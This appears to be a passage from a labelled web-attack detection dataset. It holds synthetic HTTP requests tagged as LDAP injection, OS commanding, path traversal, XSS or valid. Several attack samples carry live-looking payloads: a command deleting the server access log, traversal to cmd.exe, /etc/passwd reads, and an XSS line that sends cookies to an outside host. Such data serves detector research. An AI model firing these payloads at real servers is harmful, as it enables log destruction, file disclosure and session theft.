~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16325
Start - Id: 38770
class: LdapInjection
GET /saoarqRhtsh9m5i3om/yh7i6nEtf.jsp?ssEeaeonc5=cs&sE2=8f%29%28%26%28objectClass+%3Doalf*%29&etTiinp4MNe=05537300&amadsduu=i&J-AdZqYDinsert=8&1o1nFtn=hAaflvbscript4w%27a6soO&iteaeI7aWadn=s4TeIEia&htei=tudoc&eNaoD3iair=s1abti%25c%5Dbl&wItreodaaf0rnn=nd%40h-&t6log-pDchildwUk0G=itae HTTP/1.0
Host: www.4e1tmnia.ch
Connection: fmeO
Accept: video/*, video/mpeg;q=0.5, image/*;q=0.9
Accept-Charset: *
Accept-Encoding: deflate
Accept-Language: *
Cache-Control: no-store
Client-ip: 88.187.219.127
Cookie: GRa=ate16tibiiss;thGsee8a=(esws;inputpSp3=9536869;na=ssd5eaxo;onaCE=divlqaOsock_streamiiM;wexr214af81=lR
Cookie2: $Version="1"
Date: Tue, 26 Aug 08 06:26:11 GMT
ETag: W/"JGyuh3.3J58-vPmC"
Expect: 100-continue
From: eedz@idneeachi.org
If-Modified-Since: Sun, 21 Mar 10 21:18:27 GMT
If-Unmodified-Since: Sat, 22 Jul 06 11:14:59 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 38
MIME-Version: 6.0
Pragma: no-cache
Proxy-Authorization: msqj1 teTt=oUahvo
Authorization: edzh nuUs2osn=ijuohy
Range: 7-
Referer: /O6sn/yeoos/rzuea.html
TE: trailers,gzip;q=0.1,trailers
Trailer: Accept-Language
User-Agent: iHiveesdkDgShss3nl
UA-CPU: Sparc
UA-Disp: 1821,609,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 343x5234
Via: 8.1 www.ddenNs.png, 8.2 49.250.97.224
Transfer-Encoding: 7ledo6; torge2=rhneoOt
Upgrade: uheEfl/5.8, bsp/0.2, slh/3.9, tfor/3.1, iAr/7.5
Warning: 757 214.136.112.103 "ie6uit3rtiiPirtc" "Mon, 03 Oct 05 02:38:07 UTC"
X-Forwarded-For: 15.223.231.187
X-Serial-Number: 323337935267147
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 38770
Start - Id: 43107
class: OsCommanding
GET /emrnuayase0nh37it/usPlq/AlinkcMexecechoS.msf?ikvgseltrr51th=%250arm+-f++++%2Fvar%2Flog%2Fhttpd%2Faccess_log++++%3B&Rk5N=902067&5noNh=silKoYfPGD HTTP/1.0
Host: www.Sekn5tDt.gov:916
Connection: close
Accept: image/png, audio/x-wav;q=0.9
Accept-Charset: x-mac-korean, iso-8859-3;q=0.3, x-mac-hebrew
Accept-Encoding: compress;q=0.6
Accept-Language: muhmf-are7n;q=0.7, oi-sloEy;q=0.6, mrr-6T;q=0.9
Cache-Control: no-transform
Client-ip: 98.175.194.206
Cookie: oey3efl9rrsN=201
Cookie2: $Version="389"
Date: Wed, 13 May 09 02:40:40 CET
ETag: W/"serhTk.H6CLaJXWV4zF"
Expect: 100-continue
From: roneeua@1gSEvrlu.org
If-Modified-Since: Mon, 21 Jul 08 18:19:23 GMT
If-Unmodified-Since: Mon, 30 Aug 04 05:38:48 GMT
If-Match: "gE.IzgTyNvOb1HYcbFH"
If-None-Match: "eMLl4dlwTxHxQvYT"
If-Range: "HL4rjtEB9D0isHuw"
Max-Forwards: 866
MIME-Version: 6.4
Pragma: no-cache
Proxy-Authorization: iwt7 3rBen=urehn5nI
Authorization: Digest uri=/T1ebtt.php
Referer: /olwah/vogaad6/br4odme7/fFesttes/nosmhhss.js
TE: trailers,chunked;q=0.0
Trailer: Date
User-Agent: xXOQDZr http://www.tAIs.net
UA-CPU: 68000
UA-Disp: 046,4473,8
UA-OS: Linux
UA-Pixels: 2923x7442
Via: 7.9 148.23.116.1:01865, FTP/1.7 www.eEule.htm, 8.6 www.qNotcp.gif
Transfer-Encoding: gzip
Upgrade: gowla/8.8, 8aooI/3.3, Tkiyol/1.8
Warning: 117 www.nI2s.jpeg "duaiiS2" 
X-Forwarded-For: 204.73.145.24
X-Serial-Number: 306986025864028
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43107
Start - Id: 36567
class: OsCommanding
GET /backup/..��../..��../winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: 80.175.93.208
Connection: nAseya1
Accept: */*
Accept-Charset: *;q=0.7
Accept-Encoding: compress
Accept-Language: *;q=0.1
Cache-Control: tvvewn='3exEttok'
Client-ip: 117.70.6.179
Cookie: Sdy6nab=313
Cookie2: $Version="655"
Date: Fri, 23 Jan 04 19:51:22 CET
ETag: W/"g8bltgAKXO5Z5rPL@p"
Expect: 100-continue
From: osNAoh@aHn2nry.de
If-Modified-Since: Mon, 17 Sep 07 02:32:52 GMT
If-Unmodified-Since: Mon, 22 May 06 09:33:10 UTC
If-Match: "f82VsZpd.HZDE.qc"
If-None-Match: *
If-Range: Wed, 06 Apr 05 08:40:52 GMT
Max-Forwards: 60
MIME-Version: 7.3
Pragma: no-cache
Proxy-Authorization: 4eitC tieta=unrJ6ewe
Authorization: tcpfic reesTpr=hh3orhdh
Range: -961935,910376-
Referer: /Azpmaaa/affhf/bae8qieo/eile.msf
TE: trailers,gzip;q=0.4,gzip
Trailer: If-Match
User-Agent: Mozilla/9.0 (Machintosh; U; Mac OS X 0.8; oi-p9; rv:2.6.3) Gecko/60536175
UA-CPU: Sparc
UA-Disp: 1693,583,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 547x5195
Via: HTTP/2.9 186.100.131.110
Transfer-Encoding: deflate
Upgrade: iOe8/3.1
Warning: 144 52.115.217.55:7498 "trdsyhirr51fyxZdk" 
X-Forwarded-For: 232.88.214.55
X-Serial-Number: 33496662681000
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36567
Start - Id: 46205
class: PathTransversal
GET /nBStPEnO@iXOyh/eJo3gzMxggYOa2o0u0As/t9-bVkrL4UD6v/if/CXirftp@EK/voagancCgnqcsnd.dll?CmC1l8H=%2Fetc%2Fpasswd HTTP/1.1
Host: 187.71.229.85
Connection: close
Accept: */*;q=0.5
Accept-Charset: x-mac-greek
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=295
Client-ip: 116.139.98.213
Cookie: nSvuayEeloeiobT=4spametame9d gcoh;ktey0anaan=rxE24RapYXUO;rmsts9eai=sstt;ZEQZt=rO@0IK
Cookie2: $Version="43"
Date: Wed, 18 Oct 06 04:15:47 GMT
ETag: W/"BwoAIQ_gJnkwh@ELCI"
Expect: 100-continue
From: meamrne@llueIt.be
If-Modified-Since: Sat, 02 Feb 08 01:40:20 UTC
If-Unmodified-Since: Fri, 20 Feb 09 21:16:22 UTC
If-Match: *
If-None-Match: *
If-Range: "zqUu0-3EU3ISXYcO"
Max-Forwards: 4
MIME-Version: 5.7
Pragma: i1so4=1wEytna
Proxy-Authorization: Basic YWNlaTp0dVJlYw==
Authorization: NTLM dHRmOW9pdHNFVG4xbWh3dG5BZW5vMmFuMDJ5QWRlbGg3dUU=
Range: 684-,-674552,060-
Referer: http://aehtc.org/lHnh74i.php
TE: gzip,trailers
Trailer: Date
User-Agent: uh8LuBR http://www.seLydr.uk
UA-CPU: x86
UA-Disp: 411,052,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 939x7286
Via: 6.5 231.32.166.77, 1.9 17.12.20.169
Transfer-Encoding: reauo; w1wRcde=ltxq6e
Upgrade: peg/8.7, taas/9.0, SiHads/8.8, ne61as/9.8
Warning: 034 www.nkeyuho.html "s4csmi7rg" 
X-Forwarded-For: 249.22.33.20
X-Serial-Number: 03479803459
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 46205
Start - Id: 47100
class: XSS
GET /aitefsres7hex6sofn/tU9zmJvT8chw/slwW9/rJZRxL4QCzx/rtIran9hnHros/lgn/os_3E1lZC/twB_LLJFLF-jQXH/trct54yntncmoeldc2ri/et/c0oitkn/oydIgSKYP6.js?mRYpasswd0Acmdt3Pyh=cCuNBGCmlfYt&oauEhehe=03043338&4H0HJk.rscript.and4=%3Dcat%7Es&hegCd0y2=UdsaaeieaK2e&ihnlRuortpo=gqeWTp3zQGyb&rexkgreCpae=%3Cimg++++src%3D++%22+mocha%3A%5Bdocument.location.replace++%28%27http%3A%2F%2Fwww.etta.com%2Fcgi-bin%2Fdelaie.cgi%27%2Bdocument.cookie%29%3B%5D++%22++++%3E&LPvJIHzdF6db=Eplhg4nDst9s&an8tu=lq4 HTTP/1.0
Host: 49.83.171.130:80
Connection: close
Accept: audio/basic, video/mpeg
Accept-Charset: *
Accept-Encoding: 
Accept-Language: usfnhoth-dnmaoomh;q=0.3, naoutdr-5oi
Cache-Control: no-cache
Client-ip: 51.141.13.228
Cookie: ikMhpe=oNlwwa~akz;sititd2=lkmuFU3g
Cookie2: $Version="1"
Date: Wed, 25 Feb 09 02:44:57 UTC
ETag: "zKz@NoFA35pXxCg"
Expect: SuneNo=naithni;emlsz
From: Srtniim@ss0iltolEd.ch
If-Modified-Since: Fri, 21 May 04 11:44:49 CET
If-Unmodified-Since: Sat, 06 Oct 07 07:07:00 UTC
If-Match: *
If-None-Match: "Tnw7pnDlBwV9uyUb96h"
If-Range: Sat, 02 Jun 07 19:13:50 CET
Max-Forwards: 5812
MIME-Version: 2.8
Pragma: fad=esf9pcm
Proxy-Authorization: aos2 yryvu=gt6dn
Authorization: clanh toeioab=N3shitr
Range: 74-7756,9-
Referer: /hweul/Oaab/ahenibaJ/loireir/reja.js
TE: chunked;q=0.2,trailers
Trailer: If-None-Match
User-Agent: eaheo5ettle
UA-CPU: Sparc
UA-Disp: 016,6175,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 320x898
Via: HTTP/2.3 www.ice5n5tt.png
Transfer-Encoding: bhu3; bcqahef=eintli
Upgrade: mwcnt/9.8, Dizwoq/2.8, rtnuoa/0.5
Warning: 246 www.ARdz.htm "saetdtrt" 
X-Forwarded-For: 32.49.185.177
X-Serial-Number: 60697232
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47100
Start - Id: 46319
class: PathTransversal
GET /mx8xor9Ul/ll/KpOXCF-1nd_vH4T/ATnpI6ZkHpBE8.jsp?moylaSio=34755&Oederdcto=tnacncpa&sOtoloyp=%2Fetc%2Fpasswd&2GDw.1wVkYA=errsr3dinb3jnesnel HTTP/1.0
Host: www.scfnr9pd.be
Connection: eM2qd
Accept: */*
Accept-Charset: shift_jis;q=0.8, windows-1253;q=0.0
Accept-Encoding: *
Accept-Language: neE5Q-bnPt1;q=0.1, munMaadA-e7an;q=0.1, TN-h, dLe5eoT-2nrE
Cache-Control: min-fresh=74
Client-ip: 79.110.171.13
Cookie: oriTku=ec sxt hnrkf;TR1sD=d5n5Wlbw;YCOwDv=rqlib;ey8a=5399609
Cookie2: $Version="20"
Date: Tue, 14 Jul 09 05:58:04 CET
ETag: W/"1BKOAtAn71-i0xK.ka"
Expect: 100-continue
From: i4eo@detiLnij.be
If-Modified-Since: Fri, 16 Oct 09 18:45:29 CET
If-Unmodified-Since: Thu, 25 Jun 09 18:35:04 UTC
If-Match: "azJGIiqSel9iXHa@"
If-None-Match: "mI9f03cd5Sy3g3SZWs"
If-Range: *
Max-Forwards: 2
MIME-Version: 2.5
Pragma: no-cache
Proxy-Authorization: Digest uri=/hecitr/doeame/jelauc/aesajiHl/e5sikade.cfm
Authorization: NTLM NG9wdHUyYUVvcXRlbjJnc2Flc2FkbmVvYTl0aWFlMWNhbmxCcnk=
Range: 595-7160,98-,4-961
Referer: /mfe5e/eswj1o/ose6nAz/lclns/oW4rrDt.conf
TE: trailers
Trailer: Connection
User-Agent: ivbeivvk
UA-CPU: Sparc
UA-Disp: 0145,4311,32
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 434x579
Via: HTTP/6.6 www.ogoeyiij.tiff, t7aa/3.1 www.maees.png
Transfer-Encoding: identity
Upgrade: Dnh/3.3, iienNa/1.0, khpjt/2.7, ote6v4/0.0
Warning: 494 178.239.117.244 "Abhgtrgfsota" "Tue, 21 Mar 06 06:42:46 CET"
X-Forwarded-For: 189.150.137.247
X-Serial-Number: 0373535580
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46319
Start - Id: 3640
class: Valid
GET /8Nadh9giNxaunwaOlte/eooaht9dywenCwco/hgXVo_Ge/rU8iI6kU5/rIrshLa.php?otniwqliibltin=wUeostdinnseoqf&SitH7ywqya3zd=53&7xtermD8N=akb%29rh+iframeot&GwQoqShtpassbgsoundeb2I=%24%27%3C&3x2d=eroxscOmlk9dMtr2&hqYuVINPf6Jc=aeerabh32ob0eG&gnl292eRm=dq6CJuKGoxr&Aannyte=172044&nionl=ae HTTP/1.0
Host: www.nemfsy.be
Connection: venneadz
Accept: */*
Accept-Charset: *;q=0.5
Accept-Encoding: deflate, identity, identity;q=0.8
Accept-Language: iaa-9sz;q=0.4, m-wini8uaS;q=0.7, oaas-ta2qbtt, iu6rtbge-nu6u, q-32ea;q=0.2
Cache-Control: no-transform
Client-ip: 79.185.159.211
Cookie: ic2eaA=hlogmwhereautoexecued-txt;s8mNmh=rtb;r2u=oatohehsvtouauuzc;lBlikevTdocumentiJy=o\ec9&r@me8t2Y?otelnet;peieexno0ftiur=|;scauyneoiwstvfj=1372691685
Cookie2: $Version="387"
Date: Fri, 22 Jun 07 18:31:26 CET
ETag: "kKa@X1stg9PBNpTOZ"
Expect: ttbs=Iammcyan;ehvTg=Btegrha
From: iaeitS7@hsAh8.fr
If-Modified-Since: Thu, 26 Jan 06 17:56:51 GMT
If-Unmodified-Since: Mon, 22 Mar 10 12:57:03 GMT
If-Match: *
If-None-Match: "AGQe@ODTkRPyZv0h"
If-Range: "IiCJ@vvV_kmS9CUw"
Max-Forwards: 974
MIME-Version: 8.6
Pragma: no-cache
Proxy-Authorization: Digest opaque="nde1rea"
Authorization: Digest algorithm=MD5-sess
Range: -66041,943-,-24
Referer: /itnM/tshad6.mdb
TE: trailers
Trailer: Host
User-Agent: w5icnbl
UA-CPU: Sparc
UA-Disp: 8239,236,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 767x775
Via: FTP/5.3 www.pvge.jpeg, HTTP/7.5 123.244.96.242:9, 5.8 www.clthmTsH.tiff:13
Transfer-Encoding: compress
Upgrade: decg/1.7
Warning: 615 www.rhpe.shtml "litiIofi1" 
X-Forwarded-For: 153.114.223.45
X-Serial-Number: 02989198199377
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 3640
Start - Id: 30174
class: Valid
GET /touZi4engesN7n/6NUJfh.SrFz/watdrhi/nsQnB/mJwX.jpeg?oiiBleccs7c=77&rneote6=nettahEf&twFieNln=iai%5CmeiN%3A+esphe&l2Btagott4xe=S%24+&2hoRo=etHcc&jvWENCJfrom=ep&ksod=sW9a HTTP/1.1
Host: www.oeqist.be
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.7
Accept-Language: a-nmravv, wish-ait6A
Cache-Control: max-age=8069
Client-ip: 111.9.97.121
Cookie: faarualH1vdt=shtGbtrrmochaaesstbv;9MMWBtincludeki=ttonnbk
Cookie2: $Version="3"
Date: Wed, 04 Apr 07 12:29:13 UTC
ETag: W/"jjm@N-l1CcVk.VXsfi"
Expect: Ggag
From: n30oip@sye2lHtos.gov
If-Modified-Since: Tue, 21 Oct 08 16:51:45 UTC
If-Unmodified-Since: Fri, 24 Nov 06 21:55:48 GMT
If-Match: *
If-None-Match: "wCV3lrmngQrNoKbwF"
If-Range: "wAl6SqMF18zZ_9r"
Max-Forwards: 1071
MIME-Version: 6.5
Pragma: no-cache
Proxy-Authorization: aGeo uhioari5=RFiho
Authorization: NTLM a2dpdGhycGx0b3RzeGVlbnNyYTdyOHJzcnRwNWVpdGFhQ2FhaXI=
Range: 77-,-72,-70
Referer: /EoN0es4/dezWi/snet.asmx
TE: chunked;q=0.9,trailers
Trailer: Upgrade
User-Agent: noaTucgmHkeO
UA-CPU: Sparc
UA-Disp: 133,828,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 488x0113
Via: 7.6 www.sagrS.png, 8.9 www.R5icA.jpeg
Transfer-Encoding: deflate
Upgrade: delna/9.9, tta/9.0
Warning: 337 145.226.205.116 "slrtoretepnre" 
X-Forwarded-For: 46.52.217.2
X-Serial-Number: 5387143927109477044
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 30174
Start - Id: 8493
class: Valid
GET /null0E0wNXqN4q2Se/aBQPwmY/ctsir/aeepnyi1sohtapT/i0CAB@oJbLNhrVCKd/nhdyn1e/OgBUTNOpasswd-w/qsltaeoaleyn/erorld/fk5/tmpLw7K/Ur10Laccess_logIZ7.shtml?ooaMcrmec=taTm9dEb&ZhjpsnrNh2mldk=960966 HTTP/1.0
Host: www.eaduooaByt.de
Connection: keep-alive
Accept: */*
Accept-Charset: ks_c_5601-1987, iso-8859-1;q=0.2, iso-8859-6
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=34232
Client-ip: 246.250.117.34
Cookie: eT=olet 0vdw;inpektdQeElltn=eoNmd8QIl;ri6qi8ej=67
Cookie2: $Version="415"
Date: Fri, 13 Jul 07 07:07:29 GMT
ETag: "x-0vskwvvt.CtBrpiL@m"
Expect: 100-continue
From: WtxnId@lyeaa1uWd.cz
If-Modified-Since: Sun, 14 Nov 04 11:47:56 CET
If-Unmodified-Since: Sun, 11 Jul 04 22:36:17 CET
If-Match: "3dtwjWmRYFjHW6w"
If-None-Match: *
If-Range: Sun, 18 May 08 16:32:20 CET
Max-Forwards: 12
MIME-Version: 3.8
Pragma: no-cache
Proxy-Authorization: Basic ZWRpdWVxaWE6Nmxvb2k=
Authorization: NTLM bGE4ZHRoZW5vY3I3bXNzYXRlZ3J5aW9mdEhkdG5zaGVpZGlzb3dlQWY=
Range: -665,319484-,9-
Referer: /pimo3q/aLiirpl/rtnodmi/eaxasr/lEtahpt.mp3
TE: trailers,trailers
Trailer: Accept-Charset
User-Agent: Mozilla/7.7 (compatible; ataeo; WinNT; iotmaTpy)
UA-CPU: 68000
UA-Disp: 8051,5811,8
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 6704x1260
Via: 6.5 www.reeU9.jpg, FTP/2.0 www.Tsbgbwe4.shtml, 4.2 148.144.154.27
Transfer-Encoding: pcyeu; agcch=cirn9EzP
Upgrade: euen/7.1, tvtd1/2.8
Warning: 054 220.48.171.98 "iEbptnlss" "Sun, 08 Mar 09 01:03:10 CET"
X-Forwarded-For: 249.204.156.98
X-Serial-Number: 116122935
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 8493
Start - Id: 16559
class: Valid
GET /ntunnt5rtt/efeuoarsn/ieP.jpeg?OmexecLJjIgHlib=227725&RnRj=3telnet&nor=76412137&jEsG.iwinntI9i6=eW%401_n.02nsX HTTP/1.0
Host: www.Uy8mnoa.cz
Connection: Eaj6ecoe
Accept: */*
Accept-Charset: gb2312;q=0.2, iso-8859-7, x-mac-cyrillic
Accept-Encoding: *
Accept-Language: *;q=0.1
Cache-Control: max-age=7345
Client-ip: 110.75.170.196
Cookie: eje1sebutacE=8
Cookie2: $Version="756"
Date: Fri, 18 Apr 08 20:58:24 GMT
ETag: "wYIs06Fsia7Ksvvv0K1@"
Expect: anso=emn1tqz
From: o7mnatoB@rrengt.ch
If-Modified-Since: Wed, 17 Jun 09 05:18:05 CET
If-Unmodified-Since: Sat, 02 Aug 08 17:30:43 CET
If-Match: *
If-None-Match: *
If-Range: Wed, 17 Mar 04 08:04:51 GMT
Max-Forwards: 08
MIME-Version: 3.0
Pragma: no-cache
Proxy-Authorization: NTLM YWllc2F0MWFzbGUzaFJuZWN1d3FmYW1SdE9lUGNkUGVlZ29vb2lnYXd0OG5lYw==
Authorization: btntT NucNysu=jlatrr0
Range: -098113
Referer: /Ezih.mpeg
TE: deflate;q=0.6
Trailer: If-Range
User-Agent: Mozilla/2.5 (Machintosh; U; Mac OS X 2.1; lA-o8; rv:7.6.0) Gecko/42162119
UA-CPU: 68000
UA-Disp: 2808,9760,16
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 9430x4545
Via: HTTP/4.0 www.Dlvh.jpeg:09, HTTP/5.5 61.167.52.176
Transfer-Encoding: identity
Upgrade: ere0/9.6
Warning: 516 www.depn.jpeg "etvr6cs" "Wed, 28 Mar 07 21:45:30 GMT"
X-Forwarded-For: 184.226.48.9
X-Serial-Number: 4070028617537255
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16559
Start - Id: 22092
class: Valid
GET /aceiyg/67/Ene/et9dnsNx/oKhLjmaRr0P2Nfrh9/f2Ew.faVxk-_/h-T8fKjBYONa/ore/ertianettPpw7h3Y.exe?ShGscTi%u=+trRueMd&dcd=fnr&iile0hIecelx=p%7C&strwiGal0urrqs=0ntNmnli&tsTtmih=8&mju1rodoo=o1mFC&ssnns6e=224&3Ctj77P9VLvG=wv+s%25t%24&64DVF=751&u0nLoxf1en=fiIek&xcT8hLrhitntn=uvDujjrW&deisw4wsmmht=itYNhA&7jnoyS3tgue=%3Fnrhm%7Cde&Uldgr=028&GY6yJUrK@Ep@=1 HTTP/1.0
Host: 128.209.161.173
Connection: keep-alive
Accept: audio/*;q=0.4, audio/basic, audio/x-wav
Accept-Charset: *
Accept-Encoding: *
Accept-Language: isn-tUxtym;q=0.1
Cache-Control: no-store
Client-ip: 172.100.60.135
Cookie: ArrAxdEiy=46961240;idpttnfoezgy=jobjecte7iwnngoiuautoexecqoa;oSrlSfrdtn=00980474
Cookie2: $Version="48"
Date: Wed, 13 Apr 05 16:01:48 UTC
ETag: "@8wx4JTUYk9t0x0R"
Expect: eWnuseym=c7ibb
From: eidhdeG@fpho.st
If-Modified-Since: Thu, 12 Apr 07 08:38:19 GMT
If-Unmodified-Since: Thu, 03 Aug 06 08:53:51 UTC
If-Match: "Crlysb.4o0VI60CwE"
If-None-Match: *
If-Range: *
Max-Forwards: 0071
MIME-Version: 1.8
Pragma: ri=lx
Proxy-Authorization: Basic czFoa2FFOm9yaHJ0cA==
Authorization: Digest cnonce="hatFo"
Range: -63,8739-,76572-
Referer: /7iuner6/rsoutXt.jsp
TE: trailers,chunked;q=0.4
Trailer: If-Modified-Since
User-Agent: Mozilla/6.8 (Machintosh; U; PPC Mac OS X 2.8; mg-MI; rv:5.3.6) Gecko/14632421
UA-CPU: StrongARM
UA-Disp: 7235,8490,8
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 8724x0388
Via: 5.3 167.32.211.49
Transfer-Encoding: deflate
Upgrade: ireEu/5.5
Warning: 503 www.atcO.png "aniinsIheewgiof" 
X-Forwarded-For: 223.155.250.69
X-Serial-Number: 42920569636252963929
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 22092
Start - Id: 44752
class: PathTransversal
GET /t@xBHcZ1ZfWjoQsqA.htm?itznesmUgdesin=doc%28+++file%3A%2F%2F%2Fc%3A%2F9N%2Fhp0I.xml++++%29&tr0nooalhmivt=1004580219&andls--jK.gv98=dovPiresi8s2&stordTOnqawte=hcdicmd&OggwN2iUBbgsoundtmp=giaelttonssbrle&naRewydtc=haat5ixseenbetweennph-%26&kVn-T3Y=%5Dyereeiohnlhewinntlc&iioie9twins=%2Fecom%2Bd%28iphpioL&esganf=39 HTTP/1.1
Host: 255.146.3.33
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: gzip;q=0.1, gzip;q=0.0, deflate, deflate;q=0.3, deflate;q=0.9
Accept-Language: *;q=0.9
Cache-Control: haea='efx'
Client-ip: 45.186.49.209
Cookie: yswjvo=gZgi7;wclYsnyeeyqreo=i1rtn
Cookie2: $Version="764"
Date: Thu, 24 Aug 06 01:59:24 UTC
ETag: W/"xb-ZO.Nm0QQKMM6"
Expect: SIzOu3
From: Uafm@Ronm1eAtst.fr
If-Modified-Since: Thu, 17 Aug 06 18:30:03 GMT
If-Unmodified-Since: Fri, 13 Nov 09 11:51:37 CET
If-Match: "74rJfz9ONNJn3dj03C7"
If-None-Match: "hWBAETg7jpDTDFR"
If-Range: *
Max-Forwards: 8678
MIME-Version: 3.8
Pragma: no-cache
Proxy-Authorization: Basic c3FvaWFyOmVjT1ZzNW4=
Authorization: Digest uri=http://www.crorh5j.de/hsdToon/cmbhjk.php4
Range: 027680-5,4627-
Referer: http://inbsgv.biz/ttlf.css
TE: chunked;q=0.4
Trailer: TE
User-Agent: bml78ni
UA-CPU: x86
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 7624x8326
Via: 6.4 212.103.232.30, fir/7.4 www.8nyllt7r.png, 9.4 www.eocwyseg.shtml
Transfer-Encoding: cdeup1
Upgrade: Qya/6.2
Warning: 079 www.n1cn.tiff "meawmehgeEqekttk" "Tue, 06 Jul 04 17:24:32 UTC"
X-Forwarded-For: 23.27.136.158
X-Serial-Number: 66520697255736682
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44752
Start - Id: 19919
class: Valid
GET /hlrtee/hMNSDy1K9Wh3O/tQwycnnQi11XnFnj/euqbXwOWtLQk/tjz@Yhl-60AM1xX6/06H/cIDgl.Ppp63a9zq/Bnateenhaoasnaazoee/hyskD@mGZ/IheetoT/eqhesipaen/9QHpassthru6vEuWJ2D.exe?Uz8E=atTi&g%uEV5style=Ueeecomepzrle3p HTTP/1.1
Host: www.tufe8.com
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: koi8-r, cp-932;q=0.6, x-mac-arabic
Accept-Encoding: compress, identity, identity, deflate
Accept-Language: *
Cache-Control: min-fresh=672
Client-ip: 198.74.117.202
Cookie: htm=dbg6s;ear=1;FunodeRncB=rwy3ciioosPHbn;kGWj2i=0accepto:s;hj6us=whafsnuntlrs;uddi=nlx4al
Cookie2: $Version="958"
Date: Sun, 08 Jul 07 12:55:38 UTC
ETag: W/"RCjO2WcwhLGdpA9"
Expect: 0n0aoi=tottio
From: hneNgnvt@ijh5.org
If-Modified-Since: Tue, 03 Jun 08 10:37:24 GMT
If-Unmodified-Since: Thu, 20 Oct 05 24:02:39 UTC
If-Match: *
If-None-Match: *
If-Range: Fri, 14 Aug 09 12:16:08 UTC
Max-Forwards: 1
MIME-Version: 9.9
Pragma: o='xss'
Proxy-Authorization: psgd u1nboal=nusmme
Authorization: souyi yYoee=eawhtcn
Range: -8804
Referer: /ecqwes8/rea6t1o.aspx
TE: trailers,trailers,gzip
Trailer: Via
User-Agent: KndVsu5sB (zA88Ni@; 0wzfJ52; dpJ7Azjm)
UA-CPU: StrongARM
UA-Disp: 611,1277,16
UA-OS: Win98
UA-Color: color16
UA-Pixels: 205x6501
Via: Bthb/1.0 www.cen4.gif
Transfer-Encoding: gzip
Upgrade: nofnHJ/3.3, Eo0/1.9, eex/2.7, dloapf/3.8
Warning: 450 48.243.254.125 "en3iG7pyth5l" 
X-Forwarded-For: 163.246.110.241
X-Serial-Number: 52555
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 19919
Start - Id: 10093
class: Valid
GET /dNsT_21PYXRKM/oo7o/sEDhe/iDQ4@/lFOVTgx2lS/mcsahh6smies7Pvefstd/A.fGimgfm/AsTR4OSHtJH4SD/mCaeLxF8eJjIRQuHY/eomC.z0m8sC9tTJ36.js?el37hzO9=idnee&g2sti=Eps&tindrne=lmCwgq_Z&gp=g%3At%5Chttps HTTP/1.0
Host: 177.202.141.124:0666
Connection: lsfdlrs
Accept: text/*;q=0.6, text/*;q=0.7, image/*
Accept-Charset: *;q=0.9
Accept-Encoding: *;q=0.0
Accept-Language: pira-ie5f, sigam-xtac;q=0.6, byt-e3Rmelna;q=0.3, rezs0e1-fIEeGl5s, h5r-X
Cache-Control: no-transform
Client-ip: 251.8.73.96
Cookie: ro5ol=0542707;echoGamail=<ieeh s
Cookie2: $Version="4"
Date: Wed, 28 Nov 07 12:23:40 CET
ETag: W/"46a3uowHMI8pCi.mXy"
Expect: 100-continue
From: cpsF@ecrt6wy.ch
If-Modified-Since: Fri, 26 Jan 07 11:56:57 CET
If-Unmodified-Since: Mon, 14 Apr 08 24:50:29 CET
If-Match: *
If-None-Match: "U8nyqZZu2OCyOyp"
If-Range: Sat, 10 May 08 08:20:02 GMT
Max-Forwards: 441
MIME-Version: 3.2
Pragma: sea=onttteem
Proxy-Authorization: Basic d2lia25yczpzNnR0
Authorization: Digest opaque="eoAe7dst"
Range: 2-,2991-737219
Referer: http://n6ngrnse.biz/MiholTs/aytA.jsp
TE: trailers
Trailer: If-Match
User-Agent: iQ87L.T0ba http://www.scvnnl.cz
UA-CPU: 68000
UA-Disp: 886,964,8
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 9723x8891
Via: 4.4 209.92.162.230, 9.6 204.21.198.110:9, 7.1 196.104.119.22
Transfer-Encoding: gzip
Upgrade: Nraco/5.1, 3tms/3.4
Warning: 301 www.Ipmhyt.jpeg "eqieennEenOi6nv" 
X-Forwarded-For: 219.87.157.60
X-Serial-Number: 78634326822916597
